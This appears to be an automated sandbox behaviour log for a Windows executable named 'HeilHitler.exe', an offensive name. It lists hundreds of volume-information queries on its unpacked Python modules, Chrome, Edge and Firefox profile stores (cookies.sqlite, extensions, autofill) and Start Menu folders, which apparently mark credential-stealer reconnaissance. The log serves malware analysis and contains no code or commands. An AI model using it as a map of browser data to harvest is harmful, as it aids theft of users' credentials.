              Source: C:\Users\user\Desktop\HeilHitler.exeQueries volume information: C:\Users\user\Desktop\HeilHitler.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\HeilHitler.exeQueries volume information: C:\Users\user\Desktop\HeilHitler.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\HeilHitler.exeQueries volume information: C:\Users\user\Desktop\HeilHitler.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\HeilHitler.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI74322 VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\HeilHitler.exeQueries volume information: C:\Users\user\Desktop\HeilHitler.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\HeilHitler.exeQueries volume information: C:\Users\user\Desktop\HeilHitler.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\HeilHitler.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI74322 VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\HeilHitler.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI74322\_socket.pyd VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\HeilHitler.exeQueries volume information: C:\Users\user\Desktop\HeilHitler.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\HeilHitler.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI74322 VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\HeilHitler.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI74322\select.pyd VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\HeilHitler.exeQueries volume information: C:\Users\user\Desktop\HeilHitler.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\HeilHitler.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI74322 VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\HeilHitler.exeQueries volume information: C:\Users\user\Desktop\HeilHitler.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\HeilHitler.exeQueries volume information: C:\Users\user\Desktop\HeilHitler.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\HeilHitler.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI74322 VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\HeilHitler.exeQueries volume information: C:\Users\user\Desktop\HeilHitler.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\HeilHitler.exeQueries volume information: C:\Users\user\Desktop\HeilHitler.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\HeilHitler.exeQueries volume information: C:\Users\user\Desktop\HeilHitler.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\HeilHitler.exeQueries volume information: C:\Users\user\Desktop\HeilHitler.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\HeilHitler.exeQueries volume information: C:\Users\user\Desktop\HeilHitler.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\HeilHitler.exeQueries volume information: C:\Users\user\Desktop\HeilHitler.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\HeilHitler.exeQueries volume information: C:\Users\user\Desktop\HeilHitler.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\HeilHitler.exeQueries volume information: C:\Users\user\Desktop\HeilHitler.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\HeilHitler.exeQueries volume information: C:\Users\user\Desktop\HeilHitler.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\HeilHitler.exeQueries volume information: C:\Users\user\Desktop\HeilHitler.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\HeilHitler.exeQueries volume information: C:\Users\user\Desktop\HeilHitler.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\HeilHitler.exeQueries volume information: C:\Users\user\Desktop\HeilHitler.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\HeilHitler.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI74322 VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\HeilHitler.exeQueries volume information: C:\Users\user\Desktop\HeilHitler.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\HeilHitler.exeQueries volume information: C:\Users\user\Desktop\HeilHitler.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\HeilHitler.exeQueries volume information: C:\Users\user\Desktop\HeilHitler.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\HeilHitler.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI74322\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\HeilHitler.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI74322\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\HeilHitler.exeQueries volume information: C:\Users\user\Desktop\HeilHitler.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\HeilHitler.exeQueries volume information: C:\Users\user\Desktop\HeilHitler.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\HeilHitler.exeQueries volume information: C:\Users\user\Desktop\HeilHitler.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\HeilHitler.exeQueries volume information: C:\Users\user\Desktop\HeilHitler.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\HeilHitler.exeQueries volume information: C:\Users\user\Desktop\HeilHitler.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\HeilHitler.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI74322 VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\HeilHitler.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI74322\_ssl.pyd VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\HeilHitler.exeQueries volume information: C:\Users\user\Desktop\HeilHitler.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\HeilHitler.exeQueries volume information: C:\Users\user\Desktop\HeilHitler.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\HeilHitler.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI74322 VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\HeilHitler.exeQueries volume information: C:\Users\user\Desktop\HeilHitler.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\HeilHitler.exeQueries volume information: C:\Users\user\Desktop\HeilHitler.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\HeilHitler.exeQueries volume information: C:\Users\user\Desktop\HeilHitler.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\HeilHitler.exeQueries volume information: C:\Users\user\Desktop\HeilHitler.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\HeilHitler.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI74322 VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\HeilHitler.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI74322 VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\HeilHitler.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI74322 VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\HeilHitler.exeQueries volume information: C:\Users\user\Desktop\HeilHitler.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\HeilHitler.exeQueries volume information: C:\Users\user\Desktop\HeilHitler.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\HeilHitler.exeQueries volume information: C:\Users\user\Desktop\HeilHitler.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\HeilHitler.exeQueries volume information: C:\Users\user\Desktop\HeilHitler.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\HeilHitler.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI74322 VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\HeilHitler.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI74322\_hashlib.pyd VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\HeilHitler.exeQueries volume information: C:\Users\user\Desktop\HeilHitler.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\HeilHitler.exeQueries volume information: C:\Users\user\Desktop\HeilHitler.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\HeilHitler.exeQueries volume information: C:\Users\user\Desktop\HeilHitler.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\HeilHitler.exeQueries volume information: C:\Users\user\Desktop\HeilHitler.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\HeilHitler.exeQueries volume information: C:\Users\user\Desktop\HeilHitler.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\HeilHitler.exeQueries volume information: C:\Users\user\Desktop\HeilHitler.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\HeilHitler.exeQueries volume information: C:\Users\user\Desktop\HeilHitler.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\HeilHitler.exeQueries volume information: C:\Users\user\Desktop\HeilHitler.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\HeilHitler.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI74322\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\HeilHitler.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI74322\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\HeilHitler.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI74322 VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\HeilHitler.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI74322\_queue.pyd VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\HeilHitler.exeQueries volume information: C:\Users\user\Desktop\HeilHitler.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\HeilHitler.exeQueries volume information: C:\Users\user\Desktop\HeilHitler.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\HeilHitler.exeQueries volume information: C:\Users\user\Desktop\HeilHitler.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\HeilHitler.exeQueries volume information: C:\Users\user\Desktop\HeilHitler.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\HeilHitler.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI74322 VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\HeilHitler.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI74322 VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\HeilHitler.exeQueries volume information: C:\Users\user\Desktop\HeilHitler.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\HeilHitler.exeQueries volume information: C:\Users\user\Desktop\HeilHitler.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\HeilHitler.exeQueries volume information: C:\Users\user\Desktop\HeilHitler.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\HeilHitler.exeQueries volume information: C:\Users\user\Desktop\HeilHitler.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\HeilHitler.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI74322\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\HeilHitler.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI74322\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\HeilHitler.exeQueries volume information: C:\Users\user\Desktop\HeilHitler.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\HeilHitler.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI74322 VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\HeilHitler.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI74322\unicodedata.pyd VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\HeilHitler.exeQueries volume information: C:\Users\user\AppData\Local\Temp VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\HeilHitler.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\HeilHitler.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\HeilHitler.exeQueries volume information: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessibility VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\HeilHitler.exeQueries volume information: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessories VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\HeilHitler.exeQueries volume information: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Administrative Tools VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\HeilHitler.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\HeilHitler.exeQueries volume information: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Maintenance VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\HeilHitler.exeQueries volume information: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\HeilHitler.exeQueries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\7-Zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\HeilHitler.exeQueries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessibility VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\HeilHitler.exeQueries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\HeilHitler.exeQueries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\System Tools VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\HeilHitler.exeQueries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Administrative Tools VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\HeilHitler.exeQueries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\AutoIt v3\Extras VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\HeilHitler.exeQueries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\AutoIt v3\Extras\AutoItX VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\HeilHitler.exeQueries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Java VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\HeilHitler.exeQueries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\System Tools VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\HeilHitler.exeQueries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Windows PowerShell VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\HeilHitler.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\HeilHitler.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\AutofillStates VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\HeilHitler.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\AutofillStates VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\HeilHitler.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\BrowserMetrics VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\HeilHitler.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\BrowserMetrics VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\HeilHitler.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\CertificateRevocation VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\HeilHitler.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\CommerceHeuristics VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\HeilHitler.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\CommerceHeuristics VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\HeilHitler.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Crashpad VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\HeilHitler.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Crashpad\attachments VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\HeilHitler.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Crashpad\reports VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\HeilHitler.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Crashpad\attachments VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\HeilHitler.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Crashpad\reports VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\HeilHitler.exeQueries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\HeilHitler.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Crowd Deny VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\HeilHitler.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Crowd Deny VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\HeilHitler.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\AutofillStrikeDatabase VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\HeilHitler.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\AutofillStates VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\HeilHitler.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\BrowserMetrics VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\HeilHitler.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\CertificateRevocation VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\HeilHitler.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\CommerceHeuristics VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\HeilHitler.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\blob_storage VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\HeilHitler.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\blob_storage VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\HeilHitler.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Crashpad\attachments VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\HeilHitler.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Crashpad\reports VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\HeilHitler.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Crowd Deny VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\HeilHitler.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\HeilHitler.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\blob_storage\fccd7e85-a1ff-4466-9ff5-c20d62f6e0a2 VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\HeilHitler.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\AutofillStrikeDatabase VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\HeilHitler.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\BudgetDatabase VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\HeilHitler.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cache VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\HeilHitler.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\blob_storage\fccd7e85-a1ff-4466-9ff5-c20d62f6e0a2 VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\HeilHitler.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\blob_storage VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\HeilHitler.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\blob_storage\fccd7e85-a1ff-4466-9ff5-c20d62f6e0a2 VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\HeilHitler.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\BudgetDatabase VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\HeilHitler.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache\js VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\HeilHitler.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cache VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\HeilHitler.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cache VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\HeilHitler.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\HeilHitler.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache\js VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\HeilHitler.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache\js\index-dir VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\HeilHitler.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache\js\index-dir VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\HeilHitler.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache\wasm VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\HeilHitler.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache\wasm\index-dir VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\HeilHitler.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\commerce_subscription_db VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\HeilHitler.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache\wasm\index-dir VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\HeilHitler.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\commerce_subscription_db VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\HeilHitler.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\HeilHitler.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\DawnCache VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\HeilHitler.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Download Service VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\HeilHitler.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Download Service\EntryDB VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\HeilHitler.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Download Service\EntryDB VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\HeilHitler.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Download Service\Files VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\HeilHitler.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Download Service\Files VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\HeilHitler.exeQueries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\HeilHitler.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension Scripts VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\HeilHitler.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension State VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\HeilHitler.exeQueries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\content-prefs.sqlite VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\HeilHitler.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache\js\index-dir VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\HeilHitler.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache\wasm VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\HeilHitler.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache\wasm\index-dir VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\HeilHitler.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\commerce_subscription_db VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\HeilHitler.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\coupon_db VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\HeilHitler.exeQueries volume information: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessibility VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\HeilHitler.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\BrowserMetrics VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\HeilHitler.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\databases VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\HeilHitler.exeQueries volume information: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessories VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\HeilHitler.exeQueries volume information: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Administrative Tools VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\HeilHitler.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\DawnCache VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\HeilHitler.exeQueries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqlite VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\HeilHitler.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\CertificateRevocation VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\HeilHitler.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Download Service\EntryDB VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\HeilHitler.exeQueries volume information: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Maintenance VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\HeilHitler.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Crashpad VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\HeilHitler.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Crashpad\attachments VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\HeilHitler.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Download Service\Files VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\HeilHitler.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension Rules VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\HeilHitler.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Crashpad\reports VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\HeilHitler.exeQueries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\7-Zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\HeilHitler.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\HeilHitler.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\HeilHitler.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension State VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\HeilHitler.exeQueries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\System Tools VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\HeilHitler.exeQueries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\favicons.sqlite VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\HeilHitler.exeQueries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Administrative Tools VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\HeilHitler.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\HeilHitler.exeQueries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\AutoIt v3 VolumeInformationJump to behavior
